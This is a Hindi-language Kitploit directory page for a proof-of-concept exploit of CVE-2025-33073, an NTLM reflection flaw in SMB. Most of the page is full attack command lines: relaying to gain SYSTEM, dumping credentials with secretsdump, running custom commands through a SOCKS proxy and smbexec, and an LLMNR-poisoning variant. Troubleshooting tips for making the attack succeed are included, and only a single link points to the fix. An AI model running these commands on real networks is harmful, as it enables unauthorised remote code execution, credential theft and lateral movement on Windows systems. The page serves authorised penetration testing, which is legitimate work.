Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-33073 — NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/starscow/cve-2025-33073
भेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubstarscow/cve-2025-33073

CVE-2025-33073

NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-33073

NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट।

सभी श्रेय आधिकारिक शोध को जाते हैं:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

पूर्वापेक्षाएँ

OS: Kali Linux (अधिकांश पैकेज पहले से इंस्टॉल होते हैं)।

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (रिपॉजिटरी में शामिल)
  • xterm (केवल GUI के लिए)

उपयोग का उदाहरण

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

कस्टम कमांड
secretsdump चलाने के बजाय एक कस्टम कमांड निष्पादित की जा सकती है।

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
SYSTEM के रूप में वैध कनेक्शन स्थापित होने के बाद कमांड के अधिक गुप्त निष्पादन के लिए। यहाँ --target और --target-ip समान होने चाहिए।

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image इसके अलावा SAM डंप करने के बजाय proxychains के माध्यम से एक कस्टम कमांड चलाई जा सकती है।

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

DNS आवश्यकता के बिना मैनुअल एक्सप्लॉइट

यदि आप डिवाइस के समान ब्रॉडकास्ट डोमेन में हैं और यह LLMNR पॉइज़निंग के लिए संवेदनशील है, तो DNS रिकॉर्ड पंजीकृत किए बिना डिवाइस का शोषण करना संभव है।

image

समस्या निवारण

  • मैंने देखा है कि कभी-कभी हमला काम नहीं करता क्योंकि हमले के लिए होस्टनाम का उपयोग किया जाता है जिसके परिणामस्वरूप Kali से DNS लुकअप होता है। यदि Kali DNS सर्वर का उपयोग नहीं कर रहा है या आपको impacket-ntlmrelayx से '/ FAILED' संदेश मिलता है, तो होस्ट को अपनी /etc/hosts फ़ाइल में जोड़ने का प्रयास करें। इससे हमला काम करना चाहिए।
  • यदि IP का उपयोग कर रहे हैं तो हमला काम करना चाहिए। कभी-कभी इसे कई बार चलाने से विफलता के बजाय SUCCESS मिलता है। अब तक यह पूरी तरह से स्पष्ट नहीं है कि ऐसा क्यों होता है। मुझे लगता है कि इसका नेटवर्किंग से कुछ लेना-देना है।
  • -M या --method का उपयोग करके कोई अन्य coerce विधि आज़माएँ।

Wireshark

स्थानीय NTLM प्रमाणीकरण होता है image

स्थानीय NTLM प्रमाणीकरण नहीं होता जिसके परिणामस्वरूप FAILED प्रयास होता है image

जानना अच्छा है

  • xterm मध्य माउस बटन से कॉपी और पेस्ट करने की अनुमति देता है।
  • DNS-रिकॉर्ड क्लाइंट को भी ज्ञात होना चाहिए, कुछ अवसरों पर इसमें अधिक समय लग सकता है। अधिक समय से मेरा मतलब है कुछ मिनट दें।
  • यह केवल एक PoC है जिसका अर्थ है कि AV/EDR बाईपास को बाईपास करने का प्रयास नहीं किया गया है। अपने जोखिम पर उपयोग करें।

कैसे ठीक करें

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

टूल डाउनलोड करें